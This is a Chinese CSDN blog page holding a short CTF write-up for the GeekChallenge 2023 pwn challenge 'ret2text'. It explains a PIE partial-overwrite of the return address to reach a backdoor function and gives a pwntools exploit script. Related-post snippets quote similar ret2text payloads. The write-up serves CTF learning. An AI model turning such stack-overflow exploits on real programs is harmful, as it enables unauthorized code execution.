GeekChallenge 2023 pwn ret2text

最新推荐文章于 2024-09-26 17:12:37 发布

north956

最新推荐文章于 2024-09-26 17:12:37 发布

阅读量424

点赞数 10

本文链接：https://blog.csdn.net/qq_69743753/article/details/134472112

版权

CTF 同时被 3 个专栏收录

19 篇文章 0 订阅

订阅专栏

Geek Challenge 2023

19 篇文章 0 订阅

订阅专栏

pwn

9 篇文章 0 订阅

订阅专栏

分析

程序开了PIE

程序有后门函数

在vul函数中存在栈流出

所以可以利用PIE特性覆盖返回地址的底一个字节为后门函数的底一字节

EXP:

from pwn import *
p=remote('x',0)

backdoor=0x27
payload=b'a'*88+p8(backdoor)
p.send(payload)

p.interactive()

结语：

本人是菜鸟，想找对CTF感兴趣的CTFer,一起交流学习,共同进步，迈向星辰大海!!!!^_^(有兴趣的加扣群:470196890)

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

north956

关注关注

10
点赞
踩
8

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

跟着CTF-wiki学pwn——ret2text

qq_42882717的博客

06-21

1161

肾么叫做万死不辞呀，就是每天被气死一万次，也不辞职…(哭哭

PWN ret2text

prettyX的博客

11-21

929

今天跟着B站UP学习了ROP，向UP表示感谢。 0X01 什么是ROP ROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode，只是利用文件中给出的多个跳转指令，实现利用原有代码达到获取shell的目的。 0X02 ROP使用的地方 1、当程序开启了NX保护机制；NX策略是使栈区域的代码无法执行，但我们可以使用RO...

1 条评论您还未登录，请先登录后发表或查看评论

【PWN · ret2text】——[CTFHub]ret2text

Mr_Fmnwon的博客

04-20

1873

经典的ret2text流程。

【PWN · ret2text】[BJDCTF 2020]babystack

Mr_Fmnwon的博客

04-20

1019

作为pwn新手，尽可能在刷题中，记录、学习一些通用的知识点，因此wp是少不了的。本题是一道简单的ret2text。

pwn ret2text 解题步骤

Jingged的博客

03-12

226

擦看溢出数据32位加4字节偏移；64位加8字节偏移。这只是一个示例具体的地址填充需要自己寻找。先看main函数之后拓展找到溢出点。找到后门地址或自己编写后门。

【PWN · ret2text】[CISCN 2019华北]PWN1

Mr_Fmnwon的博客

04-21

565

依旧是简单的ret2text。

入门pwn题目ret2text

llrraa2010的专栏

03-26

123

同时发现get_shell函数可以打开shell，地址为0x8048522。用32位ida打开，f5看函数，发现vulnerable存在溢出。看堆栈，返回的地址存在0x8c,buf地址为0x78，偏离20。

pwn ret2text

小龙在线

09-12

709

首先把ret2text用IDA打开： 64位ELF文件。进入main函数，F5反编译，双击vulnerable函数，进入：发现溢出点。函数窗口列表，查看success，发现shell：进入IDA普通视图，双击左侧success函数，查看success地址，是400566。写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.

PWN初体验之ret2text

weixin_43137410的博客

08-04

688

"Hello,World!"的浪漫可能只有直男才懂！

pwn基本ROP——ret2text

turtlesd的博客

04-25

880

ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理控制主函数的return返回到文件函数中自带的system函数的地址，从而获得最高权限漏洞分析利用checksec [file_name]指令获取可执行文件的保护措施开放情况命令： checksec ret2text 可以看到，该可执行文件是32位的，仅开启了NX堆栈不可执行保护。也就是

[PWN] CTF-WIKI ret2text

qq_46441427的博客

02-06

486

ret2text 首先我们打开题目，checksec一下，主要是查看一下该程序是多少位的，并了解其保护机制 32位的小端位程序，没有开启canary堆栈保护及NX，于是我们用32位ida打开我们打开ida-32，看到源码，发现了一个get函数，这属于我们常说的危险函数在函数框，我们找到了一个secure函数，调出来，发现有一个system("/bin/sh")函数这个时候，我们只需要知道调用system函数的指令的地址，然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8470

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

计算机网络笔记001

cocofu的博客

09-22

705

通信网络研究的是通信终端（如电话）和内部通信问题，而计算机网络则更关注计算机之间的联网和通信，比如我们的Wi-Fi网络。分布式系统是一种建立在计算机网络之上的、具有高度内聚性 ( Cohesiveness ) 和透明性 ( Transparency ) 的系统，呈现给用户的是一个统一的系统，好像是一台计算机 。#### 学生D：云计算平台也是，像AWS，不同的服务如存储、计算和数据库虽然独立，但通过一个统一的管理界面和API协作，用户感觉是一个整体。#### 老师：没错，这是一部分。

动手学深度学习8.7. 通过时间反向传播-笔记&练习（PyTorch）

scdifsn的博客

09-23

1156

李沐老师《动手学深度学习（PyTorch版）》8.7. 通过时间反向传播-笔记&练习详解

H.264学习笔记

最新发布

zfenggo的博客

09-26

527

H.264凭借其出色的压缩效率、灵活的编码方式以及高质量的视频表现，成为了现代视频技术的核心标准之一。它不仅减少了存储需求，还提高了流媒体和实时视频传输的可行性。对于从高清到超高清视频，H.264的编码能力仍然广泛适用。H.264的帧结构设计（I帧、P帧和B帧）极大地提高了视频编码的压缩效率。I帧保存完整的图像信息，P帧通过参考之前的帧减少冗余数据，而B帧则通过双向参考提供进一步的压缩优势。这种帧间的协同工作大幅降低了带宽需求和存储成本，同时保持了视频的高质量。NALU头。

python学习笔记

qq_32649321的博客

09-20

630

作用：用于增加数组的维度。在数组中使用 np.newaxis 可以在指定位置增加一个新的轴，这通常用于改变数组的形状而不需要复制数据。作用：用于在多维数组上进行迭代。这个函数返回一个迭代器，它生成一个包含数组索引和对应元素值的元组。可以沿着指定的轴重复数组中的元素多次，生成一个新的数组。

redis学习笔记（六）

小柒的博客

09-20

689

redis学习笔记（六）

Maya学习笔记：项目设置和快捷键

吴梓穆的博客

09-24

247

快速空格：切换三视图，鼠标放到对应的视图上，在快速按空格，可以切到对应视图。在项目窗口里，选择要生成的子文件夹（保持默认即可），然后点下边的接受。文件/最下边选择最近的项目，在右侧展开菜单里选择刚创建的目录。只后场景会被默认保存在这个文件夹下的scenes里。F：先点击一个物体，在按F，选中的物体居中显示。主键盘5：平滑着色显示模型（默认的方式）选择一个文件夹，然后选择创建默认工作区。alt+滚路或右键拖动：缩放视角。alt+左键拖动：旋转视角。alt+中键拖动：移动视角。A：场景所有物体居中显示。

pwn ret2libc原理

08-22

pwn ret2libc是一种攻击技术，其原理是通过利用程序中的栈溢出漏洞，来控制程序的执行流程，以达到执行libc中的函数的目的。在ret2libc攻击中，程序会调用libc库中的函数，例如system函数，来执行特定的操作。但是...